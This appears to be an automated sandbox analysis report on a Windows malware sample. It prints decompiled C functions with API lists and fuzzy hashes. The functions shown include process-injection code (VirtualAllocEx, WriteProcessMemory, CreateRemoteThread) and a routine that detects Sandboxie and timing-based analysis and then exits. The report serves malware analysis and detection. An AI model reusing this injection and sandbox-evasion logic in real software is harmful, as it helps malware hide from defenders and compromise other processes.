                                    0x004037de
                                    0x004037de
                                    0x004037e4
                                    0x004037eb
                                    0x004037eb

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction ID: 0c617441959cbc84cdace3d6f91086d90079d183bae557b442fb7b10ecf1da84
                                    • Opcode Fuzzy Hash: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction Fuzzy Hash: 2921D23050E3C11FD7039B7088529997FA8EB47314B5940FBE081AB1E3C67C9A06C72A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004037EC, Relevance: 3.1, APIs: 2, Instructions: 51memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E004037EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				char _v16;
				void* _t14;
				void* _t26;
				intOrPtr _t33;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_push(0);
				_push(0);
				_t26 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x40386a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E00401CAC( &_v12, __edx);
				_t14 = VirtualAllocEx(_t38, 0, E00401D50(_v12) + 1, 0x3000, 0x40); // executed
				E00401CAC( &_v16, _t26);
				WriteProcessMemory(_t38, _t14, _t26, E00401D50(_v16) + 1,  &_v8); // executed
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00403871);
				return E00401AE4( &_v16, 2);
			}











                                    0x004037ef
                                    0x004037f1
                                    0x004037f3
                                    0x004037f8
                                    0x004037fa
                                    0x004037fe
                                    0x004037ff
                                    0x00403804
                                    0x00403807
                                    0x00403816
                                    0x00403828
                                    0x00403838
                                    0x0040384a
                                    0x00403851
                                    0x00403854
                                    0x00403857
                                    0x00403869

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction ID: 1ce7357d57a470de8e11aa6f3e94a258910408ab5c4fbe8ac5f974eefb294d6d
                                    • Opcode Fuzzy Hash: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction Fuzzy Hash: 0901A7356402047FE711AA628C42FAFBBACDB45744F614477F901F22D2D97CAE01856C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D04, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E00405D04(char __eax, void* __ebx, void* __eflags) {
				char _v8;
				struct _WIN32_FIND_DATAA _v328;
				void* _t13;
				intOrPtr _t23;
				void* _t26;

				_v8 = __eax;
				E00401F38(_v8);
				_push(_t26);
				_push(0x405d61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26 + 0xfffffebc;
				_t13 = FindFirstFileA(E00401F48(_v8),  &_v328); // executed
				if(_t13 != 0xffffffff) {
					FindClose(_t13);
				}
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(E00405D68);
				return E00401AC0( &_v8);
			}








                                    0x00405d0e
                                    0x00405d14
                                    0x00405d1b
                                    0x00405d1c
                                    0x00405d21
                                    0x00405d24
                                    0x00405d39
                                    0x00405d41
                                    0x00405d44
                                    0x00405d49
                                    0x00405d4d
                                    0x00405d50
                                    0x00405d53
                                    0x00405d60

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction ID: ef45179a0415a0f0738613dd19991e6189ea7b224224af70f6e9243e4b919f09
                                    • Opcode Fuzzy Hash: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction Fuzzy Hash: CAF08270604604AFCB11EBB9CD5698F77ECDB453147A049BBF404F22E1E73C9E009A18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040387C, Relevance: 3.0, APIs: 2, Instructions: 28memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0040387C(void* __eax, long __ecx, void* __edx) {
				void* _t2;
				void* _t5;
				void* _t9;
				long _t10;
				void* _t11;
				SIZE_T* _t12;

				_push(__ecx);
				_t10 = __ecx;
				_t11 = __edx;
				_t5 = __eax;
				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
				_t9 = _t2;
				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
				return _t9;
			}









                                    0x00403880
                                    0x00403881
                                    0x00403883
                                    0x00403885
                                    0x00403892
                                    0x00403897
                                    0x0040389e
                                    0x004038aa

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction ID: be37be616b4aec00b4a8009f52dfb0ce1374bdb392ffd0e09f2bb002aa04c1fa
                                    • Opcode Fuzzy Hash: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction Fuzzy Hash: 9FD05EA234621437E134216B6C46FB71E4CCBC7BF6E11053AB708E628294A69C0141F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B118, Relevance: 72.0, APIs: 29, Strings: 12, Instructions: 207COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 88%
                                    			E0040B118(void* __edx, void* __edi, void* __esi) {
				void* __ebx;
				char* _t1;
				char* _t2;
				char* _t3;
				char* _t4;
				char* _t5;
				char* _t6;
				char* _t7;
				char* _t8;
				char* _t9;
				char* _t10;
				char* _t11;
				char* _t12;
				char* _t13;
				long _t15;
				void* _t49;
				long _t58;
				void* _t62;
				void* _t63;
				intOrPtr* _t64;

				_t63 = __esi;
				_t62 = __edi;
				_t1 =  *0x40d1d4; // 0x40e8e0
				if( *_t1 == 1 && E004052EC() == 1) {
					ExitProcess(0);
				}
				_t2 =  *0x40d1b0; // 0x40e8e1
				if( *_t2 == 1 && L00405168(_t58, _t63) == 1) {
					ExitProcess(0);
				}
				_t3 =  *0x40d1fc; // 0x40e8e2
				if( *_t3 == 1 && E00405124() == 1) {
					ExitProcess(0);
				}
				_t4 =  *0x40d1ac; // 0x40e8e3
				_t71 =  *_t4 - 1;
				if( *_t4 == 1 && E004051CC(_t58, _t62, _t63, _t71) == 1) {
					ExitProcess(0);
				}
				_t5 =  *0x40d1f4; // 0x40e8e4
				if( *_t5 == 1 && E00405310() == 1) {
					ExitProcess(0);
				}
				_t6 =  *0x40d1c8; // 0x40e8e5
				if( *_t6 == 1 && E004054A4() == 1) {
					ExitProcess(0);
				}
				_t7 =  *0x40d1d0; // 0x40e8e6
				if( *_t7 == 1 && E004053EC() == 1) {
					ExitProcess(0);
				}
				_t8 =  *0x40d1c0; // 0x40e8e7
				if( *_t8 == 1 && E00405334() == 1) {
					ExitProcess(0);
				}
				_t9 =  *0x40d1f8; // 0x40e8e8
				_t81 =  *_t9 - 1;
				if( *_t9 == 1) {
					_t49 = E0040555C(_t58, _t62, _t63, _t81); // executed
					if(_t49 == 1) {
						ExitProcess(0);
					}
				}
				_t10 =  *0x40d1bc; // 0x40e8e9
				if( *_t10 == 1 && E0040588C() == 1) {
					ExitProcess(0);
				}
				_t11 =  *0x40d1b4; // 0x40e8ea
				if( *_t11 == 1 && E004056C0() == 1) {
					ExitProcess(0);
				}
				_t12 =  *0x40d200; // 0x40e8eb
				if( *_t12 == 1) {
					_t58 = GetTickCount();
					if(E00405750(L00405168) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004051CC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004052EC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405310) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405334) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004053EC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004054A4) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E0040555C) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004056DC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405770) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004057B4) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E0040588C) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004056C0) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405124) != 0) {
						ExitProcess(0);
					}
					if(E004056DC(_t58) == 1) {
						ExitProcess(0);
					}
				}
				_t13 =  *0x40d200; // 0x40e8eb
				if( *_t13 != 1) {
					L70:
					return _t13;
				} else {
					E00405770();
					_t15 = GetTickCount();
					_push(0);
					asm("cdq");
					 *_t64 =  *_t64 - _t58;
					asm("sbb [esp+0x4], edx");
					_t13 = _t15;
					if(0 != 0) {
						if(0 <= 0) {
							goto L70;
						}
						L69:
						ExitProcess(0);
						return _t13;
					}
					if(_t13 <= 0x1388) {
						goto L70;
					}
					goto L69;
				}
			}























                                    0x0040b118
                                    0x0040b118
                                    0x0040b119
                                    0x0040b121
                                    0x0040b12e
                                    0x0040b12e
                                    0x0040b133
                                    0x0040b13b
                                    0x0040b148
                                    0x0040b148
                                    0x0040b14d
                                    0x0040b155
                                    0x0040b162
                                    0x0040b162
                                    0x0040b167
                                    0x0040b16c
                                    0x0040b16f
                                    0x0040b17c
                                    0x0040b17c
                                    0x0040b181
                                    0x0040b189
                                    0x0040b196
                                    0x0040b196
                                    0x0040b19b
                                    0x0040b1a3
                                    0x0040b1b0
                                    0x0040b1b0
                                    0x0040b1b5
                                    0x0040b1bd
                                    0x0040b1ca
                                    0x0040b1ca
                                    0x0040b1cf
                                    0x0040b1d7
                                    0x0040b1e4
                                    0x0040b1e4
                                    0x0040b1e9
                                    0x0040b1ee
                                    0x0040b1f1
                                    0x0040b1f3
                                    0x0040b1fa
                                    0x0040b1fe
                                    0x0040b1fe
                                    0x0040b1fa
                                    0x0040b203
                                    0x0040b20b
                                    0x0040b218
                                    0x0040b218
                                    0x0040b21d
                                    0x0040b225
                                    0x0040b232
                                    0x0040b232
                                    0x0040b237
                                    0x0040b23f
                                    0x0040b24a
                                    0x0040b258
                                    0x0040b25c
                                    0x0040b25c
                                    0x0040b26d
                                    0x0040b271
                                    0x0040b271
                                    0x0040b282
                                    0x0040b286
                                    0x0040b286
                                    0x0040b297
                                    0x0040b29b
                                    0x0040b29b
                                    0x0040b2ac
                                    0x0040b2b0
                                    0x0040b2b0
                                    0x0040b2c1
                                    0x0040b2c5
                                    0x0040b2c5
                                    0x0040b2d6
                                    0x0040b2da
                                    0x0040b2da
                                    0x0040b2eb
                                    0x0040b2ef
                                    0x0040b2ef
                                    0x0040b300
                                    0x0040b304
                                    0x0040b304
                                    0x0040b315
                                    0x0040b319
                                    0x0040b319
                                    0x0040b32a
                                    0x0040b32e
                                    0x0040b32e
                                    0x0040b33f
                                    0x0040b343
                                    0x0040b343
                                    0x0040b354
                                    0x0040b358
                                    0x0040b358
                                    0x0040b369
                                    0x0040b36d
                                    0x0040b36d
                                    0x0040b379
                                    0x0040b37d
                                    0x0040b37d
                                    0x0040b379
                                    0x0040b382
                                    0x0040b38a
                                    0x0040b3be
                                    0x0040b3be
                                    0x0040b38c
                                    0x0040b38c
                                    0x0040b391
                                    0x0040b398
                                    0x0040b39c
                                    0x0040b39d
                                    0x0040b3a0
                                    0x0040b3a4
                                    0x0040b3a9
                                    0x0040b3b4
                                    0x00000000
                                    0x00000000
                                    0x0040b3b6
                                    0x0040b3b8
                                    0x00000000
                                    0x0040b3b8
                                    0x0040b3b0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040b3b2

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B162
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B17C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B196
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1CA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1E4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1FE
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B218
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B232
                                    • GetTickCount.KERNEL32 ref: 0040B245
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B25C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B271
                                      • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 004052F4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B286
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B29B
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2C5
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2DA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2EF
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B304
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B319
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B32E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B343
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B358
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B36D
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B37D
                                    • GetTickCount.KERNEL32 ref: 0040B391
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B3B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$CountTick$HandleModule
                                    • String ID: @$@$@$@$@$@$@$@$@$@$@$@
                                    • API String ID: 835719275-1661000548
                                    • Opcode ID: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction ID: c7fc4875350585e80c75c2e3c7c0fe252a246f454c130cd5c6e6d9ea2ff417f9
                                    • Opcode Fuzzy Hash: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction Fuzzy Hash: 44618230964A006EEA107BA64A06B5F1749CF52349F84007BF9447F2D3DBFDCD415AAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403A58, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloadersynchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00403A58(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v20;
				long _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t15;
				long _t17;
				void* _t19;
				void* _t23;
				void* _t24;
				void* _t31;
				long _t32;
				void* _t33;
				DWORD* _t34;

				_t25 = __ecx;
				_t34 =  &_v24;
				_t33 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t32 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
				_t15 = E004037EC(_t23, _t23, _t25, _t33, _t31, 0); // executed
				_v20 = _t15;
				_t17 = E004037EC(_t23, _t23, _t25, _t31, _t31, 0); // executed
				_v24 = _t17;
				_t19 = E004038AC(_t23,  &_v36, E00403A28, 0, 0x14); // executed
				_t24 = _t19;
				if(_t24 != 0) {
					WaitForSingleObject(_t24, 0xffffffff);
					GetExitCodeThread(_t24, _t34);
					_t32 =  *_t34;
				}
				return _t32;
			}





















                                    0x00403a58
                                    0x00403a5c
                                    0x00403a5f
                                    0x00403a61
                                    0x00403a63
                                    0x00403a65
                                    0x00403a7c
                                    0x00403a95
                                    0x00403aae
                                    0x00403ab6
                                    0x00403abb
                                    0x00403ac3
                                    0x00403ac8
                                    0x00403adb
                                    0x00403ae0
                                    0x00403ae4
                                    0x00403ae9
                                    0x00403af0
                                    0x00403af5
                                    0x00403af5
                                    0x00403b01

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403A8A
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A90
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AA3
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403AA9
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AE9
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction ID: 752bd04c13f1fb2c2637546d5d52efbb0f8f36bbb6a531361d47cc1ab833d988
                                    • Opcode Fuzzy Hash: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction Fuzzy Hash: 350157A0B443053AC610BE7A4C42A1BBE9C9BC472BB10893F7554B72D2DA7DDF0486AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004012B8, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004012B8(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				CHAR* _t8;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t8 = CharNextA(_t22); // executed
							_t22 = _t8;
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00402074(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}




















                                    0x004012bc
                                    0x004012be
                                    0x004012ca
                                    0x004012ca
                                    0x004012ca
                                    0x004012ce
                                    0x004012c8
                                    0x004012c8
                                    0x004012ca
                                    0x004012ca
                                    0x004012ce
                                    0x004012c8
                                    0x004012c8
                                    0x004012d4
                                    0x004012d7
                                    0x004012e4
                                    0x004012e6
                                    0x0040132d
                                    0x0040132d
                                    0x00401331
                                    0x00000000
                                    0x00000000
                                    0x004012ec
                                    0x00401320
                                    0x00401329
                                    0x0040132b
                                    0x00000000
                                    0x0040132b
                                    0x004012ef
                                    0x004012f4
                                    0x00401306
                                    0x00401306
                                    0x0040130a
                                    0x00000000
                                    0x00000000
                                    0x004012f9
                                    0x00401302
                                    0x00401304
                                    0x00401304
                                    0x00401313
                                    0x0040131b
                                    0x0040131b
                                    0x00401313
